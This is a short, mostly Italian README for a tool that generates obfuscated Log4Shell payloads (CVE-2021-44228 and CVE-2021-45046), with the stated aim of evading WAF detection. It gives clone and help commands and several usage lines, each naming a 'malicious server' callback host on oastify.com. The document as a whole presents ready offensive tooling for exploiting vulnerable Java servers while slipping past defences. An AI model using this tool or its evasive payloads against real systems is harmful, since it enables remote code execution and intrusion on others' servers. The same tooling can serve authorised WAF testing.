
Genera payload CVE-2021-44228 o CVE-2021-45046 offuscati primari o secondari per eludere il rilevamento WAF.
Log4Shell-obfuscated-payloads-generator può generare payload offuscati primari o offuscati secondari per CVE-2021-44228 o CVE-2021-45046 per eludere il rilevamento WAF.
The design idea of Log4Shell-obfuscated-payloads-generator
git clone https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator.git
Log4Shell-obfuscated-payloads-generator funziona subito con Python versione 3.x su qualsiasi piattaforma.
Per ottenere un elenco delle opzioni di base usa:
python3 Log4Shell-obfuscated-payloads-generator.py -h
Per ottenere esempi di utilizzo usa:
python3 Log4Shell-obfuscated-payloads-generator.py -hh
-h: ottieni un elenco delle opzioni di base

-hh: ottieni esempi di utilizzo

Con una singola opzione per generare payload, l'opzione -s specifica il server malevolo:
--generate-primary-obfuscated-cve-2021-44228-payload 8 -s ck0pf4l6fmq4w0v17o7t894txk3arz.oastify.com

--generate-primary-obfuscated-cve-2021-45046-payload 4 -s x53a0p6r07bphlgms9setupei5owcl.oastify.com

--generate-secondary-obfuscated-cve-2021-44228-payload 5 -s oia1rpap41mhxkp6rdbbywit1k7avz.oastify.com

--generate-secondary-obfuscated-cve-2021-45046-payload 5 -s 3vzg44n4hgzwaz2l4soqbbv8ezkq8f.oastify.com

Con più opzioni per generare payload, l'opzione -s specifica un server malevolo:
--generate-primary-obfuscated-cve-2021-44228-payload 4 --generate-secondary-obfuscated-cve-2021-44228-payload 4 -s exfr6fpfjr17ca4w63q1dmxjgam2ar.oastify.com

Senza specificare un server malevolo con l'opzione -s, il segnaposto {{callback_host}} verrà preservato nei payload generati:
--generate-primary-obfuscated-cve-2021-44228-payload 3

--generate-primary-obfuscated-cve-2021-45046-payload 3 --generate-secondary-obfuscated-cve-2021-45046-payload 7
